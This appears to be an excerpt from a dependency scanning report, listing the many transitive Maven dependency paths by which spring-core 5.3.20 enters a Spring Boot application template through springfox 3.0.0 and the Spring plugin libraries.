  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-beans@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
